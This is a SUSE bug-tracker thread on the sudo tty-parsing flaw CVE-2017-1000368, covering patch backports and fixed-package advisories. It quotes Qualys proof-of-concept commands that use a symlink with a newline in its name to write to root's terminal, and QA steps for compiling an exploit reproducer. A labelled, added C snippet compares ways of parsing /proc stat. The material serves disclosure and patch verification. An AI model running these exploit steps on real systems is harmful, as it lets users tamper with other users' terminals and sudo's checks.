Bugzilla – Bug 1042146
VUL-0: CVE-2017-1000368: sudo: path traversal race conditions, follow up problem
Last modified: 2017-10-25 19:09:30 UTC
Todd Miller of sudo received a secondary report following on bug 1039361. https://www.sudo.ws/pipermail/sudo-announce/2017-May/000155.html Sudo version 1.8.20p2 is now available. This fixes an issue parsing /proc/[pid]/stat on Linux when the process name contains a newline. The bug is not exploitable due to changes in how /dev is traversed made in sudo 1.8.20p1. As we are not using the secondary improved patch but the first one, we might still be affected by this. Can you please check?
The upstream patch from 1.8.20p1 searches recursively only search_devs[]. If a device is not found there, sudo_ttyname_scan() then doesn't descend into directories when it browses the rest of /dev. The patch we use in SLE-12/Leap adds /dev/shm and /dev/mqueue to ignore_devs[]. So when sudo does the BFS /dev scan for the tty device, they aren't searched at all, which prevents the symlink trickery from the Qualys exploit.
On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote:
> However, the arbitrary tty access IS exploitable in 1.8.20p1.

For example, against Sudo < 1.8.20p1:

$ /usr/bin/sudo -l
...
User john may run the following commands on localhost:
    (nobody) /usr/bin/sum
$ ln -s /usr/bin/sudo ' 1026 '
(1026 is tty2, currently used by root)
$ ./' 1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'
(this is written to root's tty2)

Or, against Sudo = 1.8.20p1:

$ ln -s /usr/bin/sudo $') 1026 \n'
$ ./$') 1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'

CVE-2017-1000368 was assigned to this newline vulnerability:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368

With best regards,
-- the Qualys Security Advisory team
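An added illustration of the parsing defect the thread is about; this is not sudo's code and not part of the bug report. It contrasts two ways of reading tty_nr (field 7) from constructed /proc/[pid]/stat contents: a line-oriented parse is derailed once the command name (field 2) contains a newline, as with the ") 1026 \n" symlink name quoted above, while anchoring on the last ')' of the whole file content still recovers the real tty_nr. The sample pid, ppid and tty values are made up.

```c
/* Added illustration, not sudo's code: two ways of reading tty_nr (field 7)
 * from /proc/[pid]/stat, applied to constructed sample contents. */
#include <stdio.h>
#include <string.h>
/* Constructed stat contents (not from a real host); tty_nr 34817 is
 * makedev(136, 1) = /dev/pts/1. In the second, comm is the symlink name
 * ") 1026 \n" from the report, so ')' and '\n' sit inside the parentheses. */
static const char STAT_PLAIN[] =
    "4242 (sudo) S 4000 4242 4242 34817 4242 4194304 0\n";
static const char STAT_NEWLINE[] =
    "4242 () 1026 \n) S 4000 4242 4242 34817 4242 4194304 0\n";
/* Parse "state ppid pgrp session tty_nr" after "(comm)"; tty_nr or -1. */
static long fields_after_comm(const char *after_paren)
{
    char state;
    long ppid, pgrp, session, tty_nr;
    if (sscanf(after_paren, " %c %ld %ld %ld %ld",
               &state, &ppid, &pgrp, &session, &tty_nr) != 5)
        return -1;
    return tty_nr;
}
/* Line-oriented parse: stop at the first '\n', then anchor on the last ')'
 * of that line. A newline inside comm cuts the line short, so the ')' found
 * is the one inside comm and the field parse is derailed. */
long tty_nr_line_based(const char *stat)
{
    char line[512];
    snprintf(line, sizeof line, "%s", stat);
    char *nl = strchr(line, '\n');
    if (nl != NULL) *nl = '\0';
    const char *rp = strrchr(line, ')');
    return rp == NULL ? -1 : fields_after_comm(rp + 1);
}
/* Whole-buffer parse: comm is the only field that may contain ')', ' ' or
 * '\n'; every later field is numeric or one letter, so the last ')' in the
 * entire contents always marks the end of comm. */
long tty_nr_buffer_based(const char *stat)
{
    const char *rp = strrchr(stat, ')');
    return rp == NULL ? -1 : fields_after_comm(rp + 1);
}
int main(void)
{
    printf("plain:   line=%ld buffer=%ld\n",
           tty_nr_line_based(STAT_PLAIN), tty_nr_buffer_based(STAT_PLAIN));
    printf("newline: line=%ld buffer=%ld\n",
           tty_nr_line_based(STAT_NEWLINE), tty_nr_buffer_based(STAT_NEWLINE));
    return 0;
}
```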
I can confirm that our packages are vulnerable to this new attack vector.
Created attachment 727965 [details]
QA reproducer

QA, to reproduce:
- Install selinux-policy-minimum
- boot with security=selinux selinux=1 enforcing=0
- get the path of the root's terminal with:
  # tty
- now as the sudo user on a different terminal:
  $ cc CVE-2017-1000368.c -o CVE-2017-1000368 -lutil
  $ ./CVE-2017-1000368 <PATH_TO_ROOT_TTY>

If affected, on the root's tty will appear:
/usr/bin/sum: unrecognized option '--
HELLO
WORLD
'
Try '/usr/bin/sum --help' for more information.
This is already fixed in tumbleweed, the newer patch was already available there so I used that.
(In reply to Simon Lees from comment #5)
> This is already fixed in tumbleweed, the newer patch was already available
> there so I used that.

The "newer patch" (from bug 1039361 comment 23) is just a different approach to fix CVE-2017-100037.
This bug (CVE-2017-100038) is fixed by https://www.sudo.ws/repos/sudo/rev/9ad60fe663e5.
Anyway, Michael Stroeder fixed Tumbleweed by the update to 1.8.20p2.

In home:simotek:branches:OBS_Maintained:sudo/sudo.SUSE_SLE-12-SP2_Update, you're backporting a wrong patch.
The one we have there is sufficient to fix CVE-2017-100037, just add the commit mentioned above.
(In reply to Vítězslav Čížek from comment #6)
> to fix CVE-2017-100037.
> This bug (CVE-2017-100038) is fixed by

Sorry, the numbers above should read CVE-2017-1000367 and CVE-2017-1000368 respectively.
Kristyna, Please update sudo in SLE-12-SP3. Otherwise all other codestreams are fixed.
(In reply to Vítězslav Čížek from comment #11)
> Kristyna,
> Please update sudo in SLE-12-SP3. Otherwise all other codestreams are fixed.

Sudo in SLE-12-SP3 was updated to 1.8.20p2 (sr#134136). It seems that everything is fixed here. Reassigning it back to the security team.
Is version 1.7.X also affected? (SLES 11 SP3 LTSS, for instance) In that case, I'll open a separate bug requesting a PTF. Thanks!
No, both CVE-2017-1000367 and CVE-2017-1000368 affect only the 1.8 branch of sudo.
See https://www.sudo.ws/alerts/linux_tty.html
Just versions 1.8.5-1.8.20p2 are vulnerable.
SUSE-SU-2017:1626-1: An update that solves one vulnerability and has one errata is now available.

Category: security (important)
Bug References: 1034560,1042146
CVE References: CVE-2017-1000368
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP2 (src): sudo-1.8.10p3-10.10.2
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): sudo-1.8.10p3-10.10.2
SUSE Linux Enterprise Server 12-SP2 (src): sudo-1.8.10p3-10.10.2
SUSE Linux Enterprise Desktop 12-SP2 (src): sudo-1.8.10p3-10.10.2
OpenStack Cloud Magnum Orchestration 7 (src): sudo-1.8.10p3-10.10.2
SUSE-SU-2017:1627-1: An update that solves one vulnerability and has one errata is now available.

Category: security (important)
Bug References: 1034560,1042146
CVE References: CVE-2017-1000368
Sources used:
SUSE OpenStack Cloud 6 (src): sudo-1.8.10p3-2.16.1
SUSE Linux Enterprise Server for SAP 12-SP1 (src): sudo-1.8.10p3-2.16.1
SUSE Linux Enterprise Server for SAP 12 (src): sudo-1.8.10p3-2.16.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src): sudo-1.8.10p3-2.16.1
SUSE Linux Enterprise Server 12-LTSS (src): sudo-1.8.10p3-2.16.1
openSUSE-SU-2017:1697-1: An update that solves one vulnerability and has one errata is now available.

Category: security (important)
Bug References: 1034560,1042146
CVE References: CVE-2017-1000368
Sources used:
openSUSE Leap 42.2 (src): sudo-1.8.10p3-9.6.1
released